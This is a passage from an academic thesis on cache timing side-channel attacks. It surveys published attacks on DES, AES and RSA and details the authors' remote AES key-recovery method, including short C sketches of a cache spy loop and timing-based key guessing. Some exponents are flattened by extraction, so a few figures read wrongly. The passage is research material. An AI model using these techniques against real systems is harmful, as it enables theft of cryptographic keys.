collect a sample of different plaintext pairs with the corresponding execution time,
the plaintext byte difference, P1 ⊕ P2 , that causes the shortest average execution
time will give the correct key byte difference, assuming a cache hit decreases the
overall execution time.

FIGURE 4.3. Two different accesses to the same table.
However, in a real environment, even if the latter access is to an element
other than the exact target of the former access, a cache hit may still
occur. Any cache miss results in the transfer of an entire cache line, not only one
element, from the main memory. Therefore, if the latter access has a target that
lies in the same cache line as the previously accessed data, a cache hit will
occur. In that case, we can still obtain the key byte difference partially as follows:
Let δ be the number of bytes in a cache line and assume that each element
of the table is k bytes long. Under this situation, there are δ/k elements in each
line, which means any access to a specific element will map to the same line as
(δ/k − 1) other accesses. If two different accesses to the same array read
the same cache line, the most significant parts of their indices, i.e., all of the bits
except the last ℓ = log_2(δ/k) bits, must be identical.¹ Using this fact, we can find
the difference of the most significant parts of the key bytes using the equation:
⟨P_1⟩ ⊕ ⟨P_2⟩ = ⟨K_1⟩ ⊕ ⟨K_2⟩,
where ⟨A⟩ stands for the most significant part of A.

1 We assume that lookup tables are aligned in memory, which is the case most of
the time. If they are not aligned, this will indeed increase the performance of the attack,
as mentioned in [73].
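As a concrete illustration (a hedged sketch assuming 64-byte cache lines and 4-byte table entries, so ℓ = 4), comparing the most significant parts of two lookup indices amounts to masking off the low ℓ bits; in the attack the collision itself is of course detected through timing rather than computed from the key.

/* Hedged sketch: cache-line granularity of table lookups.
 * delta = 64 bytes per line and k = 4 bytes per element are assumptions. */
#include <stdint.h>
#include <stdio.h>

#define ELL 4u                          /* log2(delta / k) = log2(64 / 4) */

static uint8_t msp(uint8_t index) {     /* <index>: drop the low ELL bits */
    return index >> ELL;
}

int main(void) {
    uint8_t p1 = 0x3a, k1 = 0x57, p2 = 0x91, k2 = 0xbc;
    /* The two lookups share a cache line iff the most significant parts of
     * their indices agree, which reveals <P1> xor <P2> = <K1> xor <K2>. */
    if (msp(p1 ^ k1) == msp(p2 ^ k2))
        printf("collision: <K1 xor K2> = 0x%x\n", msp(p1) ^ msp(p2));
    else
        printf("no collision for this plaintext pair\n");
    return 0;
}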
Indices of table lookups are usually more complex functions of the plaintext
and the cipherkey than just the bitwise exclusive-or of certain bytes. The
structure of these functions determines the performance of the attack, i.e., the
amount of reduction in the exhaustive search space. The basic idea presented
above can be adapted to any such function in order to develop successful attacks.
Let f_1(P, K′) and f_2(P, K″) be two different functions that specify the
indices of two different accesses to the same table, where K′ and K″ are certain
parts of the same cipherkey.

• If
⟨f_1(P, K′)⟩ = ⟨f_2(P, K″)⟩                    (4.1)
for each plaintext in a large sample, then the expected timing characteristics
of this set, e.g., median or average execution time, will be different than those
of a random sample.
When we consider this fact, a simple attack method becomes the following
(a sketch of the grouping step follows the list):

1. Phase 1: Obtain a sample of N (plaintext, encryption time) pairs generated
under the same target key.

2. Phase 2: Perform an exhaustive search on K′ and K″. Let K̃′ and K̃″ stand
for the candidate values of K′ and K″, respectively. Divide the entirety of all
(plaintext, encryption time) pairs into different sets, one for each candidate
pair (K̃′, K̃″), and put into this set all plaintexts that satisfy equation 4.1
for (K̃′, K̃″). Note that these sets need not be mutually disjoint, i.e., a
particular plaintext may obey equation 4.1 for different (K̃′, K̃″) values, in
which case it will be an element of all of these sets (one set for each different
(K̃′, K̃″) value).

3. Phase 3: Obtain the timing characteristics of each set. If all of these characteristics,
except one, are very similar to each other, the one with the different
characteristics has to be the set of the correct candidates, i.e., the one where
K̃′ = K′ and K̃″ = K″.
4.2. Cache Attacks in the Literature
In this section we summarize the cache attacks in the literature. Our
own attacks are only briefly mentioned in this chapter and described in the next
chapters in detail.
4.2.1. Theoretical Attack of D. Page
D. Page described and simulated a theoretical trace-driven cache attack on
DES [75]. We do not present the details of DES algorithm [20] in this document,
but we give the necessary information to understand the basic idea of this attack.
In DES, there are 16 rounds of computations and 8 different S-boxes. In
every round, there is an access to each of these 8 S-boxes as shown in Figure 4.4.
The indices used in the first two rounds are given below:
I_0 = K_0 ⊕ E(R_0),
I_1 = K_1 ⊕ E(L_0 ⊕ P(S(K_0 ⊕ E(R_0)))),
FIGURE 4.4. DES S-Box lookup.
where E is the expansion function and P is the permutation function. These
functions are invertible (injective), i.e., given the output, the inputs of these
functions can be calculated. S is the function implemented in the S-boxes. R_0 and
L_0 are the right and left halves of the input plaintext after the application of the
initial permutation. K_0 and K_1 are the round keys derived from the actual key,
K.
If the adversary can capture the profile of the cache activity during the
second round, i.e., the outcomes of S-box lookups using index I1 , then he can
correlate I0 and I1 . From this correlation, he can partially recover the bits of K0
and K1 , thus some bits of the actual key. The reader should notice that the values
of R0 and L0 are known by the adversary, i.e. it is a known or chosen plaintext
attack. More details of the attack can be found in the original paper [75].
This attack is hypothetical, because Page just assumed that it was possible to capture the cache profile and did not explain how. Later, Bertoni et
al. and Lauradoux showed that it was possible to capture the cache traces of a
cryptosystem using power analysis [15, 62], c.f. Sections 4.2.7 and 4.2.8.
Page’s attack requires capturing 210 encryption profiles to reduce the search
space from 256 bits to 232 bits. Page also discussed possible countermeasures
against cache attacks in [75, 76, 80].
4.2.2. First Practical Implementations
Cache attacks were first implemented by Tsunoo et al. [101, 100]. These
attacks are time-driven, cache-based timing attacks built upon the last attack
model described above. Tsunoo et al. developed different attacks on various
ciphers, including MISTY1 [101, 63], DES, and Triple-DES [100, 20]. The original
attack on MISTY1 proposed in [101] was later improved in [102]. In this paper, we
only describe the attack on DES.
Their attack focuses on the indices of the first- and last-round S-box lookups.
The adversary collects a sample of plaintexts and the corresponding encryption
times and analyzes this data to find correlations between first- and last-round S-box
indices, considering each of the 8 S-boxes, S0 through S7. From the correlations found,
he can make partial inferences about the secret key. Note that this attack employs
statistical inferences, and thus its success is probabilistic. Their experiments show
that collecting 2^23 known plaintexts reduces the search space down to 2^24 with
a success rate higher than 90%.
4.2.3. Bernstein’s Attack
Bernstein showed the vulnerability of AES by performing a cache attack
on OpenSSL’s AES implementation [14]. The attack he developed is a template
attack [24] and requires prior knowledge of the timing behavior of the cipher under
a known key on an identical platform.
There are different phases of this attack. In the first phase, profiling or
learning phase, the attacker establishes the profiles of the execution time of the
cipher under known secret keys. To establish such profiles, it is necessary to know
the value of the test keys and simulate the execution of the cipher for a sample of
known plaintexts on a platform exactly identical to the server. Even the software
installed on the target and test platforms needs to be the same [68, 66].
After establishing the profiles, the attacker can apply the actual attack to
the server. He sends random plaintexts to the server and measures the encryption
time of each plaintext. Doing so, he can establish the profile of the actual secret
key. Then he can find correlations between the actual profile and the profiles captured
during the profiling phase, each profile typical for a particular subkey. From these
correlations, he tries to predict parts of the secret key or a set of candidate
keys. He can find the actual key using a brute-force attack on the narrowed search
space.
Bernstein showed the vulnerability of AES software implementations on
various platforms [14]. There was a common belief that Bernstein’s attack is a
realistic remote attack that can recover an entire AES key. However, Neve et
al. showed in [68] that this belief is a fallacy. They described the circumstances
in which the attack might work and also the limitations of the Bernstein attack.
The details of this analysis can also be found in [66].
4.2.4. Percival’s Hyper-Threading Attack on RSA
Colin Percival developed a noteworthy cache attack on OpenSSL’s implementation of RSA [82], which is the most widely used public-key cryptosystem.
This attack is built upon the first attack model presented above (cf. Subsection 4.1.1.1).
In Subsection 4.1.1.1, we describe a general attack model that can work
in almost any environment. However, such attacks become especially powerful
in simultaneous multithreading environments, because the adversary can run the
malicious process, i.e., Spy process, simultaneously with the cipher. Running
these processes simultaneously allows an attacker to obtain not only the set of
data structures accessed by the cipher but also the approximate time that each
access occurs.
In Percival’s attack, a spy process runs simultaneously with the server.
This process continuously reads each cache set in the same order and measures
the read time of each of these cache sets as long as the cipher process operates.
If reading a cache set takes longer, the attacker can conclude that this set was
accessed during the time interval between the last read of the set by the spy
process and the current read. In this sense, it is a combined trace-driven and
access-driven cache attack.
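To make the mechanism concrete, the following is a minimal, hypothetical sketch of such a spy loop; it is not Percival's code. It assumes a direct-mapped 16 KB view of the L1 data cache with 64-byte lines and uses the processor's cycle counter to time one read per cache set; a real spy would probe one address per way of each set and interleave its passes with the victim's execution.

    #include <stdint.h>
    #include <stdio.h>
    #include <x86intrin.h>            /* __rdtsc() */

    #define CACHE_SIZE (16 * 1024)    /* assumed L1 data cache size  */
    #define LINE_SIZE  64             /* assumed cache line size     */
    #define NSETS      (CACHE_SIZE / LINE_SIZE)
    #define NPASSES    1000

    static uint8_t probe[CACHE_SIZE]; /* one line of this buffer per cache set */

    int main(void)
    {
        static uint32_t times[NPASSES][NSETS];

        for (int pass = 0; pass < NPASSES; pass++) {
            for (int set = 0; set < NSETS; set++) {
                uint64_t t0 = __rdtsc();
                /* volatile read of one line; a slow read hints that the
                   victim evicted this set since the previous pass */
                uint8_t v = *(volatile uint8_t *)&probe[set * LINE_SIZE];
                (void)v;
                times[pass][set] = (uint32_t)(__rdtsc() - t0);
            }
        }

        /* report the average probe time per cache set */
        for (int set = 0; set < NSETS; set++) {
            uint64_t sum = 0;
            for (int pass = 0; pass < NPASSES; pass++)
                sum += times[pass][set];
            printf("set %3d: %llu cycles on average\n", set,
                   (unsigned long long)(sum / NPASSES));
        }
        return 0;
    }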
This attack reveals the ‘footprints’ of a process, i.e., the steps that this process follows. In the case of RSA, Percival was able to identify the order of squaring
and multiplication operations in OpenSSL’s implementation, which employs sliding
window exponentiation with a window size of 5 bits. The known sequence of
these operations gives 200 bits of information about each of the two 512-bit secret
exponents. If it is also possible to distinguish each multiplier, based on the cache
sets they map to, then the adversary can directly obtain the value of both exponents. The same attack can straightforwardly recover the exponents, if square
and multiply exponentiation is used in the implementation.
4.2.5. Osvik-Shamir-Tromer (OST) Attacks
Osvik, Shamir, and Tromer used a similar idea to attack AES [73]. They
described and simulated several different methods to perform local cache attacks.
They make use of a local array and exploit the collisions between AES table
lookups and the accesses to this array. None of their methods can be used as a
remote attack, e.g. an attack over a local network, unless the attacker is able to
manipulate the cache remotely.
In their attack model, the adversary reads garbage data to load it into
the cache, waits for someone else to start an encryption, and after the encryption
he reads the garbage data again to find the cache sets accessed by the AES process.
Clearly, this attack is very similar to the model in Subsection 4.1.1.1 and it is an
access-driven attack.
In the OST attack, the adversary analyzes the cache sets that are accessed
during the first two rounds of AES and predicts the table lookup indices. Then, he
recovers the key with the knowledge of these indices. This attack is very efficient
and requires only 300 encryptions on AMD Athlon and 16000 encryptions on
Pentium 4.
4.2.6. Last Round Access-Driven Attack
Osvik et al.’s access-driven attack considers the accesses of the first two AES
rounds. Neve et al. improved this attack by taking the last round accesses into
consideration.
The most widely used AES implementation employs a single lookup table,
called T4, for the last round computations (c.f. Section 2.2.2). The adversary
completely evicts T4 from the cache by reading a local array before an AES
computation as done in [73] (c.f. Sections 4.2.5 and 4.1.1.1). After the AES
execution, he determines which data blocks of T4 are accessed by the cipher.
Then he eliminates the values that cannot be the correct value of the last round
key bytes with the knowledge of unaccessed data blocks and the ciphertext value.
The adversary continues to apply this elimination method by collecting data from
other AES executions until he finds the correct round key.
This attack is calculated to require fewer than 13 encryptions on average in
an ideal environment to break AES on systems that have a cache line size of
64 bytes.
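A minimal sketch of this elimination idea is given below. It is our own illustration rather than Neve et al.'s code, and it assumes an idealized observation model in which the attacker learns, after one encryption, which cache-line-sized block of T4 was accessed. The table inv_sbox stands for the inverse AES S-box (not reproduced here), and the block size corresponds to 64-byte lines holding 16 four-byte T4 entries.

    #include <stdint.h>
    #include <string.h>

    #define BLOCK_BITS 4                  /* log2(T4 entries per cache line) */
    #define NBLOCKS    (1 << (8 - BLOCK_BITS))

    static uint8_t alive[16][256];        /* alive[i][k]: k still possible for
                                             last round key byte i            */

    void init_candidates(void) { memset(alive, 1, sizeof(alive)); }

    void process_encryption(const uint8_t inv_sbox[256],
                            const uint8_t ciphertext[16],
                            const uint8_t block_accessed[NBLOCKS])
    {
        for (int i = 0; i < 16; i++)
            for (int k = 0; k < 256; k++) {
                if (!alive[i][k])
                    continue;
                /* index of the T4 lookup that produced ciphertext byte i
                   under the hypothesis that k is the round key byte       */
                uint8_t idx = inv_sbox[ciphertext[i] ^ (uint8_t)k];
                /* if that index falls into a block the cipher never touched,
                   the hypothesis k must be wrong                            */
                if (!block_accessed[idx >> BLOCK_BITS])
                    alive[i][k] = 0;
            }
    }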
4.2.7. Cache-based Power Attack on AES from Bertoni et al.
Bertoni et al. devised a cache based power attack on AES that can theoretically break the cipher with 512 encryptions [15]. They realized that cache misses
are easily observable through power analysis at least in a simulation environment.
In this attack, the adversary is assumed to know the exact location of AES
Sbox, the exact implementation, and the details of the cache architecture, i.e.,
cache size, block size, and associativity. He first triggers the AES computation to
load Sbox into the cache. Then, he evicts a particular Sbox entry from the cache
and runs AES again, but this time he also measures the power consumption of
the execution. If AES accesses this particular entry during the computation,
the adversary can detect if and when it happens. Therefore, he can understand
which Sbox lookup causes an access to that particular entry. Performing the same
method with each Sbox entry allows the adversary to determine the indices of the
AES lookups.
Bertoni et al. tested their attack in a simulation environment using the
Simplescalar-3.0 toolset [11, 22] and Power Analyzer [55], a library for power
modelling that can be integrated into Simplescalar. We want to mention that their
attack is theoretical because they did not consider the details of practical issues
that arise in an actual attack.
4.2.8. Lauradoux’s Power Attack on AES
Another cache power attack is from Lauradoux [62]. He presented a cache
attack on AES, which exploits the internal cache collision instead of the external
collisions that were used in Bertoni et al.’s attack. This attack analyzes the power
consumption of the AES execution to detect the occurrences of internal collisions
during the first AES round. This knowledge allows an adversary to reveal the
values of certain key byte differences and immediately reduces the exhaustive
search space from 128 bits to 80 bits. The basic underlying idea presented in [62]
is similar to our first round attack (c.f. Section 5.2.1).
4.2.9. Internal Cache Collision Attacks by Bonneau et al.
Bonneau et al. documented possible internal collision based time-driven
cache attacks in [18]. The experimental results show that their most effective
attack, which considers the collisions that occur during the last round of AES, requires
between 2^13 and 2^20 encryptions to break the cipher. This last round attack
requires the fewest encryptions among all of the time-driven cache attacks
presented above.
4.2.10. Overview of Our Cache Attacks
Although the results presented in [18] seem low, they do not reflect
actual situations. Bonneau et al.’s experiments, along with those given in [14],
are conducted in a hypothetical environment without considering realistic
scenarios. In all of these experiments, the AES encryption is executed via a
function call and the execution time of this internal AES function is measured
and used in the analysis. However, in a real attack, there is no way that an
adversary can execute inside his own process an AES cipher that operates with
a secret key owned by someone else. The cipher and the attack tool have to be
different unrelated processes running on the same or different machines connected
via a network. Therefore, an actual attack suffers from measurement noise due
to network delays, stack delays, and the like. Although the findings of [14, 18, 100]
indicate the feasibility of these cache attacks on real security systems in principle,
they do not give the computational requirements of actual attacks or prove their
practicality.
There are many studies on cache attacks in the literature and many attempts to develop a remote cache attack that can reveal a key on a server running
over a network. Despite some inaccurate claims that remote cache attacks could be
devised, which were eventually proven wrong, none of these efforts
succeeded in achieving the ultimate goal of developing a generic and universally
applicable cache attack that can also compromise remote systems. We show how
one can devise and apply such a remote cache attack in the next chapter. We
present those ideas in [5] and show how to use them to develop a universal remote
cache attack on AES. Our results prove that cache attacks cannot be considered
pure local attacks; they can be applied to software systems running over a
network.
Furthermore, in Chapter 6, we analyze trace-driven cache attacks, which
are one of the three types of cache attacks identified so far. We construct an analytical
model for trace-driven attacks that enables one to analyze such attacks on different
implementations and different platforms [3, 4]. We also develop very efficient
trace-driven attacks on AES and apply our model on those attacks as a case
study. We show that trace-driven attacks have more potential than what is stated
in previous works.
5. CACHE BASED REMOTE TIMING ATTACK ON THE AES
All of the cache attacks presented in the previous chapter, except [14],
either assume that the cache does not contain any data related to the encryption process prior to each encryption or explicitly force the cache architecture to
replace some of the cipher data. The implementations of Tsunoo et al. accomplish the so-called ‘cache cleaning’ by loading some garbage data into the cache to
clean it before each encryption [100, 101]. The need for cache cleaning makes
it impossible for an attack to reveal information about cryptosystems on remote
machines, because the attacker must have access to the computer to perform
cache cleaning. They did not investigate if their attacks could successfully recover
the key without employing explicit cache cleaning on certain platforms.
The attacks described in [73] replace the cipher data in the cache with some
garbage data by loading the content of a local array into the cache. Again, the attacker needs access to the target platform to perform these attacks. Therefore,
none of the mentioned studies can be considered practical for remote attacks
over a network, unless the attacker is able to manipulate the cache remotely.
In this chapter, we present a robust and effective cache attack, which can be
used to compromise remote systems, on the AES implementation described in
[31] for 32-bit architectures. Although our basic principles can be used to develop similar attacks on other implementations, we only focus on the particular
implementation stated above and described in Section 2.2.2.
We show that it is possible to apply a cache attack without employing
cache cleaning or explicitly aimed cache manipulations when the cipher under
the attack is running on a multitasking system, especially on a busy server. In
our experiments we run a dummy process simultaneously with the cipher process.
Our dummy process randomly issues memory accesses and eventually causes the
eviction of AES data from the cache. This should not be considered as a form of
intentional cache cleaning, because we use this dummy process only to imitate a
moderate workload on the server. In presence of different processes that run on
the same machine with the cipher process, the memory accesses that are issued
by these processes automatically evict the AES data, i.e., cause the same effect of
our dummy process on the execution of the cipher.
5.1. The Underlying Principle of Devising a Remote Cache Attack
Multitasking operating systems allow the execution of multiple processes
on the same computer, concurrently. In other words, each process is given permission to use the resources of the computer, not only the processor but also the
cache and other resources. Although it depends on the cache architecture and
the replacement policy, we can roughly say that the cache contains most recently
used data almost all the time. If an encryption process stalls for enough time, the
cipher data will be completely removed from the cache, provided other processes
are present on the machine. In a simultaneous multithreading system, the
encryption process does not even have to stall. The data of the process, especially
parts of large tables, is replaced by other processes’ data on-the-fly, if there is
enough workload on the system.
The results of our experiments show that the attack can work in such a
case in a simultaneous multithreading environment. The reader should note that
our results also point out the vulnerability of remote systems against Tsunoo’s attack
on DES.
5.2. Details of Our Basic Attack
In this section we outline an example cache attack on AES with a key size
of 128 bits. In our experiments we consider the 128-bit AES version with a block
length of 128 bits. Our attack can be adjusted to AES with key length 192 or 256
in a straightforward manner (cf. Subsect. 5.3).
The basic attack consists of two different stages, considering table-lookups
from the first and second round, respectively. The basic attack may be considered
as an adaptation of the ideas from the earlier cache attack works to a timing attack
on AES since similar equations are used. Our improved attack variant is a completely novel approach. It employs a different decision strategy than the basic one
and is much more efficient. It does not consist of separate stages but instead decomposes into sixteen
independent 8-bit guessing problems.
The differences of our approach from the earlier works are the following.
First of all, we exploit internal collisions, i.e., the collisions between different
table lookups of the cipher. Some of the earlier works (e.g. [73, 67, 77, 15]) exploit
the cache collisions between the memory accesses of the cipher and another process. Exploiting such external collisions mandates the use of explicit local cache
manipulations by (e.g.) having access to the target machine and reading a local
data structure. This necessity makes these attacks unable to compromise remote
systems. On the other hand, taking advantage of internal collisions removes this
necessity and enables one to devise remote attacks as shown in this chapter.
The idea of using internal collisions is employed in some of the previous
works, e.g. in [101, 100, 62]. The earlier timing attacks that rely on internal
collisions perform the so-called cache cleaning, which is also a form of explicit
local cache manipulations. These works did not realize the possibility of automatic
cache evictions due to the workload on the system, and therefore could not show
the feasibility of remote attacks.
We use the second attack model explained in the previous chapter. The
attack model discussed in Section 4.1.1.2 is partially correct, except that it does not
account for the fact that two different accesses to the same cache line may even
increase the overall execution time. We realized during our experimentation that
an internal collision, i.e., a cache hit, at a particular AES access either shortens
or lengthens the overall execution time. The latter phenomenon may occur if a
cache hit occurs from a logical point of view but the respective cache line has
not yet been loaded, inducing double work. Thus, if we gather a sample of
messages and each of these messages generates a cache hit during the same access,
then the execution time distribution of this sample will be significantly different
than that of a random sample. We consider this fact to develop our attacks on
the AES.
5.2.1. First Round Attack
The implementation we analyze is described in [31] and it is widely used
on 32-bit architectures (c.f. Section 2.2.2). The first 4 references to the first table,
T0, are:
P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 .
If any two of these four references are forced to map to the same cache line for a
sample of plaintexts then we know that this will affect the average execution time.
For example, if we assign the value ⟨P0 ⊕ K0 ⊕ K4⟩ to ⟨P4⟩, i.e.,
⟨P4⟩ = ⟨P0 ⊕ K0 ⊕ K4⟩
for a large sample of plaintexts, then the timing characteristics of this sample will
be different than that of a randomly chosen sample. We can use this fact to guess
the correct key byte difference ⟨K0 ⊕ K4⟩.
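In practice, the same decision can also be made from a sample of known random plaintexts by grouping them according to a candidate difference. The code below is only a sketch under our own assumptions: pt holds the N collected plaintexts, t the corresponding execution times, and ` = 4 (64-byte cache lines, 4-byte table entries); it returns the candidate for ⟨K0 ⊕ K4⟩ whose subset average deviates most from the overall mean.

    #include <stdint.h>
    #include <stdlib.h>
    #include <math.h>

    #define ELL 4                          /* assumed: l = 4 bits hidden by the line */
    #define MSB(x) ((uint8_t)(x) >> ELL)   /* most significant part of a byte        */

    int guess_k0_xor_k4_msb(const uint8_t (*pt)[16], const double *t, size_t n)
    {
        double total = 0.0;
        for (size_t i = 0; i < n; i++)
            total += t[i];
        double mean = total / (double)n;

        int best = -1;
        double best_dev = -1.0;
        /* one candidate per possible value of the top (8 - l) bits of K0 ^ K4 */
        for (int cand = 0; cand < (1 << (8 - ELL)); cand++) {
            double sum = 0.0;
            size_t cnt = 0;
            for (size_t i = 0; i < n; i++)
                if (MSB(pt[i][4]) == (MSB(pt[i][0]) ^ cand)) {
                    sum += t[i];
                    cnt++;
                }
            if (cnt == 0)
                continue;
            double dev = fabs(sum / (double)cnt - mean);
            if (dev > best_dev) {
                best_dev = dev;
                best = cand;               /* the most deviating subset wins */
            }
        }
        return best;                       /* candidate for the top bits of K0 ^ K4 */
    }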
Using the same idea, we can find all key byte differences ∆i,j = ⟨Ki ⊕ Kj⟩
with i, j ∈ {0, 4, 8, 12}. For properly selected indices (i1, j1), (i2, j2), (i3, j3), i.e. if
the GF(2)-linear span of {Ki1 ⊕ Kj1, Ki2 ⊕ Kj2, Ki3 ⊕ Kj3} contains all six XOR
sums K0 ⊕ K4, K0 ⊕ K8, . . . , K8 ⊕ K12, then each ∆i,j follows immediately from
∆i1,j1, ∆i2,j2 and ∆i3,j3. We can further reduce the search space by considering the
accesses to the other three tables T1, T2 and T3.
In general, we can obtain ⟨Ki ⊕ K4*j+i⟩ for i, j ∈ {0, 1, 2, 3}. Since (8 − `)
is the size of the most significant part of a table entry in terms of the number
of bits (c.f. Section 4.1.1.2), the first round attack allows us to reduce the search
space by 12 ∗ (8 − `) bits. The parameter ` depends on the cache architecture.
For ` = 0, which constitutes the theoretical lower bound, the search space for a
128 bit key becomes only 32 bits. For ` = 4 the search space is reduced by 48 bits
yielding an 80-bit problem.
On widely used processors, the search space typically reduces to 56, 68, or
80 bits for 128-bit keys. In the environment where we performed our experiments
the cache line size of the L1 cache is 64 bytes, i.e. the most significant part of
a key byte difference is 4 bits long. In other words, we can only obtain the first
4 bits of Ki ⊕ K4∗j+i and the remaining 4 bits have to be searched exhaustively
unless we use a second round attack.
5.2.2. Second Round Attack – Basic Variant
Using the guesses from the first round a similar guessing procedure can be
applied in the second round to obtain the remaining key bits. We briefly explain
an approach that exploits only accesses to T0 , i.e., the first table. To simplify
notation we set ∆i := Pi ⊕ Ki in the remainder of this section. In the second
round, the encryption accesses T0 four times, namely to obtain the values
2 • s(∆8) ⊕ 3 • s(∆13) ⊕ s(∆2) ⊕ s(∆7) ⊕ s(K13) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ 0x01   (5.1)
2 • s(∆0) ⊕ 3 • s(∆5) ⊕ s(∆10) ⊕ s(∆15) ⊕ s(K13) ⊕ K0 ⊕ 0x01   (5.2)
2 • s(∆4) ⊕ 3 • s(∆9) ⊕ s(∆14) ⊕ s(∆3) ⊕ s(K13) ⊕ K0 ⊕ K4 ⊕ 0x01   (5.3)
2 • s(∆12) ⊕ 3 • s(∆1) ⊕ s(∆6) ⊕ s(∆11) ⊕ s(K13) ⊕ K0 ⊕ K4 ⊕ K8 ⊕ K12 ⊕ 0x01   (5.4)
where s(x) and • stand for the result of an AES S-box lookup for the input value
x and the finite field multiplication in GF(2^8) as it is realized in AES, respectively.
If the first access (P0 ⊕ K0) touches the same cache line as (5.1) for each plaintext
within a sample, i.e. if
⟨P0⟩ = ⟨2 • s(∆8) ⊕ 3 • s(∆13) ⊕ s(∆2) ⊕ s(∆7) ⊕ s(K13) ⊕ K4 ⊕ K8 ⊕ 0x01⟩   (5.5)
the expected average execution time will be different than for a randomly chosen
sample. If we assume that the value ⟨K4 ⊕ K8⟩ has correctly been guessed within
the first round attack, this suggests the following procedure.
1. Phase: Obtain a sample of N many (plaintext, execution time) pairs.
2. Phase: Divide the entirety of all (plaintext, execution time) pairs into
2^32 (overlapping) subsets, one set for each candidate (K̃2, K̃7, K̃8, K̃13) value.
Put each plaintext into all sets that correspond to candidates
(K̃2, K̃7, K̃8, K̃13) that satisfy the above equation. Note that a particular
plaintext should be contained in about N/2^(8−`) different subsets.
3. Phase: Calculate the timing characteristics of each set, i.e., the average
execution time in our case. Compute the absolute difference between each
average and the average execution time of the entire sample. There will
be a total of 2^(4·8) timing differences, each for a different
(K̃2, K̃7, K̃8, K̃13) value. The set with the largest difference should point to the
correct values for these 4 bytes.
Hence, we can search through all candidates for (K2, K7, K8, K13) ∈ GF(2)^32 to
guess the true values. Applying the same idea to (5.2) to (5.4) we can recover
the full AES key. Note that in each of the consecutive steps only 4 · 4 = 16 key
bits have to be guessed since Ki and the most significant bits of some other
Kj follow from the first step and the difference ∆i,j from the first round attack (cf. Sect. 5.2.1),
where i is a suitable index in {2, 7, 8, 13}.
The bottleneck is clearly the first step since one has to distinguish between
2^32 key hypotheses rather than between 2^16. Experimental results are given in
Sect. 5.4. In the next section we introduce a more efficient variant that saves both
samples and computations.
5.3. A More Efficient, Universally Applicable Attack
In the previous section, we explain a second round attack where 32, resp.
16, key bits have to be guessed simultaneously. In this section we introduce
another approach that allows independent search for single key bytes. It is universally applicable in the sense that it could also be applied in any subsequent
round, e.g. to attack AES with 256 bit keys.
We explain our idea using (5.1). Our goal is to guess key byte K8. Recall
that access to the same cache line as for (P0 ⊕ K0) is required in the second round
iff (5.5) holds. If we fix the four plaintext bytes P0, P2, P7, and P13 then (5.5)
simplifies to
⟨c⟩ = ⟨2 • s(∆8)⟩   (5.6)
with an unknown constant c = c(K0, K2, K4, K7, K8, K13, P0, P2, P7, P13). We observe encryptions with randomly selected plaintext bytes Pi for i ∉ {0, 2, 7, 13}
and evaluate the timing characteristics with regard to all 256 possible values of
P8. For the most relevant case, i.e. ` = 4, there are 16 plaintext bytes (2^` in the
general case) that yield the correct (but unknown) value ⟨2 • s(∆8)⟩ that meets
(5.5). Ideally, with regard to the timing characteristics, these 16 plaintext bytes
should be ranked first, pointing at the true subkey K8; i.e. to a key byte that
gives identical right-hand sides ⟨2 • s(∆8)⟩ for all these 16 plaintext bytes. The
ranking is done similarly to Section 5.2.1. To rank the 256 P8-bytes one calculates
for each subset with equal P8 values the absolute difference of its average execution time with the average execution time of all samples. The set with the highest
difference is ranked first and so on. In a practical attack our decision rule says
that we decide for that key byte candidate K̃8 for which a maximum number of
the t (e.g. t = 16) top-ranked plaintext bytes yield identical ⟨2 • s(∆8)⟩ values. If
the decision rule does not clearly point to one subkey candidate, we may perform
the same attack with a second plaintext P0' for which ⟨P0⟩ ≠ ⟨P0'⟩ while we keep
P2, P7, P13 fixed (changing ⟨c⟩ to ⟨c'⟩ := ⟨c⟩ ⊕ ⟨P0 ⊕ P0'⟩). Applying the same
decision rule as above, we obtain a second ranking of the subkey candidates.
Clearly, if P8 and P8' meet (5.6) for P0 and P0', resp., then
⟨P0 ⊕ P0'⟩ = ⟨2 • s(P8 ⊕ K8)⟩ ⊕ ⟨2 • s(P8' ⊕ K8)⟩.   (5.7)
Equation (5.7) may be used as a control equation for probable subkey candidates
K̃8. From the ranking of P̃8 and P̃8', we derive an order for the pairs (P̃8, P̃8'),
e.g. by adding the ranks of the components or their absolute distances from the
respective means. For highly ranked pairs (P̃8, P̃8') we substitute (P̃8, P̃8', k̃) into
control equation (5.7), where k̃ is a probable subkey candidate from the ‘elementary’ attacks.
We note that the attack described above can be applied to exploit the
relation between any two table-lookups. By reordering a type (5.5)-equation one
obtains an equation of type (5.6) whose right-hand side depends only on one
key byte (to be guessed) and one plaintext byte. The plaintext bytes that affect
the left-hand side are kept constant during the attack. The whole key could be
recovered by 16 independent one-key-byte guessing problems. We mention that
the (less costly) basic first round attacks might be used to check the guessed
subkey candidates K̃0, . . . , K̃15.
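A sketch of the per-byte decision rule is given below. It is an illustration under our own assumptions, not a reference implementation: avg_time[p] is the measured average execution time over all samples whose plaintext byte P8 equals p (with P0, P2, P7, P13 fixed), overall_mean is the mean over the whole sample, sbox is the standard AES S-box supplied by the caller, and t = 16 top-ranked plaintext bytes are used as in the text.

    #include <stdint.h>
    #include <math.h>

    #define ELL 4
    #define T   16
    #define MSB(x) ((uint8_t)(x) >> ELL)

    /* multiplication by 2 in GF(2^8) as used by AES */
    static uint8_t xtime(uint8_t x) { return (uint8_t)((x << 1) ^ ((x >> 7) * 0x1b)); }

    int guess_k8(const uint8_t sbox[256], const double avg_time[256], double overall_mean)
    {
        /* rank the 256 possible P8 values by |subset average - overall mean| */
        int rank[256];
        for (int i = 0; i < 256; i++)
            rank[i] = i;
        for (int i = 0; i < 256; i++)              /* simple selection sort */
            for (int j = i + 1; j < 256; j++) {
                double di = fabs(avg_time[rank[i]] - overall_mean);
                double dj = fabs(avg_time[rank[j]] - overall_mean);
                if (dj > di) { int tmp = rank[i]; rank[i] = rank[j]; rank[j] = tmp; }
            }

        /* decide for the key byte under which a maximum number of the T
           top-ranked plaintext bytes give identical <2 * s(P8 ^ K8)> values */
        int best_key = -1, best_count = -1;
        for (int k = 0; k < 256; k++) {
            int hist[1 << (8 - ELL)] = {0};
            for (int r = 0; r < T; r++)
                hist[MSB(xtime(sbox[rank[r] ^ k]))]++;
            int max = 0;
            for (int v = 0; v < (1 << (8 - ELL)); v++)
                if (hist[v] > max)
                    max = hist[v];
            if (max > best_count) { best_count = max; best_key = k; }
        }
        return best_key;
    }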
5.3.1. Comparison with the basic second round attack from Subsect. 5.2.2
For sample size N the ’bottleneck’ of the basic second round attack, the 32
bit guessing step, requires the computation of the average execution times of 2^32
